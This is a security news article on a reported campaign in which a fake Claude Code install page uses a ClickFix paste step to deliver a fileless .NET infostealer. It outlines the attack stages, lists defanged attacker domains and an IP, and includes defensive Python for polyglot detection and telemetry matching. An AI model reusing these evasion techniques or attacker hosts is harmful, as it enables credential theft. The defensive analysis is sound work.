Fake Claude Code Page Delivers Fileless .NET Infostealer
Cybercriminals are exploiting the growing interest in AI coding tools, specifically targeting users searching for Claude Code installation guides. A recent campaign employs deceptive installer pages to silently steal credentials from unsuspecting victims, a threat detailed in a report from Cyderes' Howler Cell threat research unit. The attackers use SEO poisoning to push a spoofed Anthropic install page to the top of search results. Once a user lands there, the trap is set.
The campaign is designed for a very specific audience. Rather than targeting IT professionals, it goes after first-time developers and non-technical users excited about a new tool.
These users have no baseline for what a real installation process looks like, making them more likely to follow instructions without question. The delivery chain is six stages deep and almost entirely fileless after the first step.
Analysts from Cyderes, through their threat research unit Howler Cell, identified this active SEO poisoning campaign targeting users searching for Claude Code installation guides.
According to a Cyderes report shared with Cyber Security News (CSN), attackers placed a spoofed Anthropic install page at the top of search results and used a ClickFix lure to execute a malicious MSHTA command via the Windows Run dialog.
The final payload is a reflective .NET infostealer that beacons to Russian infrastructure for credential exfiltration.
The consequences of a successful infection are serious. Stolen credentials, drained accounts, and compromised identities are among the real-world outcomes Howler Cell flagged in their analysis.
Many victims have no enterprise security controls between them and a spoofed download page. Anthropic itself is not compromised; its brand is simply being impersonated.
What makes this campaign stand out is the deliberate targeting logic. Operators tracked Claude Code’s rapid adoption and turned it into an attack surface.
The delivery chain was engineered to defeat file inspection, AMSI scanning, EDR telemetry, sandbox analysis, and IOC matching at every layer.
Hackers Use Fake Claude Code Install Page
The attack starts when a user searches for “Claude Code install” and clicks what looks like a legitimate Anthropic setup page.
The page instructs the visitor to open the Windows Run dialog and paste a pre-staged mshta.exe command, framed as a required step.
This is the ClickFix method, a social engineering technique that disguises attacker-controlled MSHTA commands as routine setup steps.
Stage 1 begins when mshta.exe retrieves a 6.7 MB MP3/HTA polyglot payload from download.version-516[.]com/claude.
This file passes as playable audio during security scans while hiding an executable HTA script block inside.
When mshta.exe processes the file, it skips the audio and runs the hidden script. Security tools inspecting the file header see a legitimate MP3, not a threat.
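The header-only blind spot described above is easy to close by scanning the whole body rather than trusting the MP3 magic. The following Python checker is an added example (not code from the page or the Cyderes report); its fixtures are constructed and contain no script body.

```python
import re

# What a header-only file-type check accepts as MP3: an ID3v2 tag or an MPEG
# audio frame sync (first 11 bits set) at offset 0.
ID3_MAGIC = b"ID3"

# Markup an HTA interpreter acts on. Any of it inside a file that otherwise
# presents as audio is the polyglot signal a header check misses.
HTA_MARKERS = [re.compile(p, re.IGNORECASE) for p in
               (rb"<hta:application", rb"<script\b", rb"<html\b")]

def looks_like_mp3(data: bytes) -> bool:
    """True when the first bytes pass as MP3 to a magic-number check."""
    if data.startswith(ID3_MAGIC):
        return True
    return len(data) >= 2 and data[0] == 0xFF and (data[1] & 0xE0) == 0xE0

def find_hta_markers(data: bytes) -> list:
    """Return (offset, marker) pairs for HTA/HTML markup anywhere in the blob."""
    hits = []
    for pat in HTA_MARKERS:
        m = pat.search(data)
        if m:
            hits.append((m.start(), m.group(0).decode("ascii", "replace").lower()))
    return sorted(hits)

def classify(data: bytes) -> str:
    """Label a blob by scanning the whole body, not just its header."""
    audio, markers = looks_like_mp3(data), find_hta_markers(data)
    if audio and markers:
        return "mp3/hta-polyglot"
    if audio:
        return "audio"
    return "hta" if markers else "other"

# Constructed fixtures (not the real payload): a bare ID3v2.4 header plus
# filler, then an empty HTA/HTML wrapper with no script body at all.
CLEAN_MP3 = b"ID3\x04\x00\x00\x00\x00\x00\x00" + b"\x00" * 64
POLYGLOT = CLEAN_MP3 + b"<html><hta:application id=x><script></script></html>"

if __name__ == "__main__":
    for name, blob in (("clean", CLEAN_MP3), ("polyglot", POLYGLOT)):
        print(name, classify(blob), find_hta_markers(blob))
```

A real scanner would also walk the MP3 frame chain and flag trailing data that is not a valid frame, but the marker scan alone already defeats the "it's just audio" verdict.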

Stage 2 uses the HTA to register a scheduled task via a COM object, spawning a 32-bit PowerShell process. Targeting the 32-bit binary is intentional because EDR coverage is often weighted toward 64-bit activity.
The script performs an AMSI bypass, RC4 decryption, and victim fingerprinting via an MD5 hash of the machine and username. Stage 3 fetches a 17 MB obfuscated script in memory from a unique subdomain on oakenfjrod[.]ru, leaving nothing on disk.
Reflective .NET Infostealer: Fileless and Hard to Catch
The final stage is a reflective .NET infostealer that runs entirely within the existing PowerShell process address space. It leaves no file artifact, spawns no new process, and creates no image-load event for defenders to anchor on.
The loading method mirrors techniques used by advanced tools like Cobalt Strike, but executed fully from PowerShell.

The infostealer beacons over HTTPS to 185[.]177[.]239[.]255:443 for command and control and credential theft. SensitiveFileRead telemetry confirmed browser credential store access during execution.
EDR platforms with .NET assembly load visibility can detect this where file-based controls cannot. Defenders should treat any Claude Code install page prompting a Run dialog paste as a likely infection event.
Blocking mshta.exe outbound HTTPS connections covers Stage 1 regardless of obfuscation. DNS queries to any subdomain of oakenfjrod[.]ru are a strong compromise indicator, and wildcard domain blocking is far more effective than per-subdomain IOC matching.
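The guidance above maps onto a handful of telemetry rules. The Python below is an added example (not from the Cyderes/Howler Cell analysis) that evaluates constructed process, DNS and network events for the stages described: mshta.exe handed a remote URL, SysWOW64 PowerShell spawned by svchost.exe (assumed here to be the Task Scheduler service host), wildcard DNS matching on the C2 domain, and the per-victim beacon URL shape from the IoC table. Event field names are assumptions, and the page's indicators stay defanged until matched.

```python
import re
# IoCs exactly as published (defanged); they are re-fanged only inside this matcher.
C2_DOMAIN, STEALER_C2_IP = "oakenfjrod[.]ru", "185[.]177[.]239[.]255"
STAGE1_HOST = "download.version-516[.]com"

def refang(ioc: str) -> str:
    return ioc.replace("[.]", ".")

# Per-victim beacon: 16 hex chars as the subdomain, then /claude-<uuid>.
BEACON_RE = re.compile(r"^https://[0-9a-f]{16}\." + re.escape(refang(C2_DOMAIN))
                       + r"/claude-[0-9a-f]{8}(-[0-9a-f]{4}){3}-[0-9a-f]{12}$", re.I)
def evaluate(ev: dict) -> list:
    """Return the names of the chain stages one telemetry event matches."""
    hits, kind = [], ev.get("type")
    image, parent = ev.get("image", "").lower(), ev.get("parent_image", "").lower()
    if kind == "process":
        # Stage 1: mshta.exe handed a remote URL (the Run-dialog ClickFix paste).
        if image.endswith("\\mshta.exe") and re.search(r"https?://", ev.get("cmdline", "")):
            hits.append("stage1_mshta_remote_url")
        # Stage 2: 32-bit PowerShell (SysWOW64 path) launched by the scheduled-task host.
        if "\\syswow64\\" in image and image.endswith("\\powershell.exe") \
                and parent.endswith("\\svchost.exe"):
            hits.append("stage2_wow64_powershell_from_task")
    elif kind == "dns":
        q = ev.get("query", "").lower()
        # Wildcard: any label under the C2 domain counts, not one fixed FQDN.
        if q == refang(C2_DOMAIN) or q.endswith("." + refang(C2_DOMAIN)):
            hits.append("stage3_c2_dns_wildcard")
    elif kind == "network":
        if ev.get("dst_ip") == refang(STEALER_C2_IP) and ev.get("dst_port") == 443:
            hits.append("stealer_c2_ip")
        if BEACON_RE.match(ev.get("url", "")):
            hits.append("stage3_beacon_url_pattern")
    return hits

def scan(events) -> dict:
    return {ev["id"]: h for ev in events if (h := evaluate(ev))}

# Constructed sample telemetry (not real logs); hosts and IP are the page's IoCs.
SAMPLE = [
    {"id": 1, "type": "process", "image": "C:\\Windows\\System32\\mshta.exe",
     "parent_image": "C:\\Windows\\explorer.exe",
     "cmdline": "mshta https://" + refang(STAGE1_HOST) + "/claude"},
    {"id": 2, "type": "process", "parent_image": "C:\\Windows\\System32\\svchost.exe",
     "image": "C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe"},
    {"id": 3, "type": "dns", "query": "0123456789abcdef." + refang(C2_DOMAIN)},
    {"id": 4, "type": "network", "dst_ip": refang(STEALER_C2_IP), "dst_port": 443,
     "url": "https://0123456789abcdef." + refang(C2_DOMAIN)
            + "/claude-11111111-2222-3333-4444-555555555555"},
]
```

Calling `scan(SAMPLE)` returns one entry per flagged event; a benign 64-bit PowerShell launched from explorer.exe produces no hit, which is the point of keying Stage 2 on the SysWOW64 path plus the svchost.exe parent.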
Indicators of Compromise (IoCs):
| Type | Indicator | Description |
|---|---|---|
| Domain | download.version-516[.]com | HTA payload delivery; fake Claude Code download site |
| Domain | oakenfjrod[.]ru | Stage 3 C2 (wildcard: *.oakenfjrod[.]ru) |
| IP | 185[.]177[.]239[.]255 | Final stealer C2 IP for credential exfiltration |
| URL | https://[md5_16char].oakenfjrod[.]ru/claude-[uuid] | Per-victim C2 beacon URL structure |
Note: IP addresses and domains are intentionally defanged (e.g., [.]) to prevent accidental resolution or hyperlinking. Re-fang only within controlled threat intelligence platforms such as MISP, VirusTotal, or your SIEM.